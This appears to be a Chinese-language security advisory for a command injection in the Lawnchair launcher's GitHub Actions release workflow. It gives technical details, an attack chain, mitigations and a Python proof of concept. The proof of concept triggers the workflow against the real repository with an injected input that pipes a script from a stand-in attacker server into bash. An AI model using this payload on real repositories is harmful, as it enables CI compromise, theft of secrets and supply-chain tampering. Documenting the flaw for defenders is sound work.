CVE-2026-39866 Lawnchair release_update.yml命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-39866

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Lawnchair

漏洞概述

Lawnchair是一款流行的免费开源Android桌面启动器。在提交fcba413f之前的版本中，其GitHub Actions自动发布流程存在严重缺陷。具体而言，`release_update.yml`工作流的调度输入未经过滤，导致存在命令注入漏洞。拥有低权限的攻击者可利用此漏洞在工作流运行时注入并执行任意恶意代码。该漏洞CVSS评分为8.8，威胁等级高危，用户应尽快更新代码。

技术细节

该漏洞根源在于Lawnchair项目GitHub Actions工作流配置不当。具体受影响的是`release_update.yml`文件，该文件定义了软件发布的自动化流程。该工作流使用了`workflow_dispatch`触发器，允许用户通过输入特定参数来手动启动发布任务。然而，代码直接将这些用户输入传递到了Shell执行环境中，未进行任何转义或过滤。攻击者利用这一特性，可以构造包含Shell元字符（如`;`、`|`、`$()`等）的恶意输入。当GitHub Runner执行工作流步骤时，这些输入被当作系统命令执行，从而实现命令注入。由于CI/CD环境通常拥有较高的权限并存储着各种敏感凭证（如代码签名密钥、部署Token），成功利用此漏洞可能导致供应链攻击、敏感信息泄露甚至服务器被完全控制。官方通过修改提交fcba413f，对输入参数进行了严格处理，从而修复了该问题。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标Lawnchair仓库及其GitHub Actions工作流配置，发现release_update.yml接受用户输入。

STEP 2

2. 获取权限

攻击者获得对仓库的低权限访问（如贡献者权限），满足CVSS向量中的PR:L要求。

STEP 3

3. 构造Payload

攻击者构造包含Shell命令注入字符的恶意输入字符串，旨在执行任意代码。

STEP 4

4. 触发工作流

攻击者通过GitHub API或Web界面手动触发workflow_dispatch事件，并传入恶意Payload。

STEP 5

5. 代码执行

GitHub Runner运行工作流，解析输入时未做过滤，导致注入的恶意命令在CI环境中执行。

STEP 6

6. 达成目标

攻击者窃取Secrets、篡改构建产物或进一步渗透内部环境。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-39866
# This PoC demonstrates how a malicious input can trigger command injection
# in the vulnerable 'release_update.yml' workflow.

# The vulnerable workflow step likely looks like this in the original code:
# run: ./build_script.sh ${{ inputs.release_version }}

# An attacker can trigger the workflow via GitHub API with the following payload:

import requests
import json

TARGET_REPO = "LawnchairLauncher/lawnchair"
GITHUB_TOKEN = "YOUR_GITHUB_TOKEN" # Token with repo access
WORKFLOW_ID = "release_update.yml"

# Malicious payload designed to inject a command
# Example: Updating version, then executing a reverse shell
PAYLOAD = "1.0.0; curl http://attacker-controlled-server/shell.sh | bash"

url = f"https://api.github.com/repos/{TARGET_REPO}/actions/workflows/{WORKFLOW_ID}/dispatches"
headers = {
    "Authorization": f"token {GITHUB_TOKEN}",
    "Accept": "application/vnd.github.v3+json"
}

data = {
    "ref": "master", # The branch to run the workflow on
    "inputs": {
        "release_version": PAYLOAD # Injecting into the vulnerable input
    }
}

response = requests.post(url, headers=headers, data=json.dumps(data))

if response.status_code == 204:
    print("[+] Workflow triggered successfully with malicious payload.")
else:
    print(f"[-] Failed to trigger workflow: {response.text}")

影响范围

Lawnchair (commit < fcba413f55dd47f8a3921445252849126c6266b2)

防御指南

临时缓解措施

建议立即检查并更新Lawnchair源代码至修复版本。如果无法立即更新，应临时禁用受影响的`release_update.yml`工作流，或者移除该工作流的`workflow_dispatch`触发权限，以防止被手动触发利用。同时，轮换所有可能已泄露的GitHub Secrets和部署密钥。